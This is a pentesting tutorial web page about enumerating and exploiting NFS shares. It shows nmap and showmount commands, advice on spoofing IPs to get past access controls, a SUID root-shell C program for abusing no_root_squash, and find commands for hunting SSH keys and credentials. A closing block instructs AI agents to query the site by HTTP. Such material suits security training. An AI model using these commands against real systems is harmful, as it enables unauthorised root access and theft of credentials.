# NFS Service - Port 2049

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## Basic info

The **Network File System (NFS)** allows file sharing across Unix-like systems over a network. While convenient, NFS often exposes sensitive data and trust relationships due to misconfigurations or outdated security models. This guide delivers in-depth methods for discovering, analyzing, and exploiting NFS services during penetration testing engagements.

### Identifying NFS Services During Network Reconnaissance

#### Port Scanning and Service Enumeration

NFS uses the following ports:

* **TCP/UDP 2049** – NFS Service
* **TCP/UDP 111** – Portmapper (rpcbind)

Run a detailed Nmap scan:

```bash
nmap -sV -sT -p 111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <target-ip>
```

Check for exposed mount points and exports.

***

### Enumerating NFS Exports

#### Using `showmount`

Check accessible NFS shares:

```bash
showmount -e <target-ip>
```

Example output:

```
Export list for 10.0.0.1:
/home           *
/var/nfs        192.168.0.0/24
```

* `*` means accessible from any host
* CIDR indicates trusted networks

#### Bypassing IP-based Access Controls

Use spoofed IP addresses or proxy from allowed subnets. In some cases, a misconfigured DNS resolution can allow access even if IP-based restrictions are in place.

***

## Mounting NFS Shares and Privilege Analysis

### Mounting an Export Locally

```bash
mkdir /mnt/nfs
mount -t nfs <target-ip>:/home /mnt/nfs
```

Check for files with improper permissions or user credentials.

### UID/GID Mappings and Root Squashing

By default, NFS applies **root squashing**: remote root becomes `nfsnobody`. Check `/etc/exports` configuration for `no_root_squash` option:

```
/home *(rw,sync,no_root_squash)
```

If `no_root_squash` is set, root access is preserved, allowing privilege escalation.

***

## Exploiting no\_root\_squash for Remote Code Execution

### Step-by-Step Attack

1. **Create a SUID Binary on Mounted Share**

   ```bash
   echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nint main(){setuid(0); system("/bin/bash");}' > rootsh.c
   gcc rootsh.c -o rootsh
   chmod +s rootsh
   mv rootsh /mnt/nfs/
   ```
2. **Trigger Execution on Target**\
   If the NFS share is mounted by a target system, wait for the binary to sync and then trigger execution through a scheduled task or user login.
3. **Gain Shell with Root Privileges**

***

## Enumerating and Extracting Sensitive Files

### Commands to Discover Valuable Files

```bash
find /mnt/nfs -type f -name "*.conf"
find /mnt/nfs -type f -name "*.pem"
find /mnt/nfs -type f -perm -4000
```

Look for:

* SSH private keys
* Database credentials
* Password backup files
* Misconfigured `.bashrc`, `.profile`, or crontabs

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/nfs-service-port-2049.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.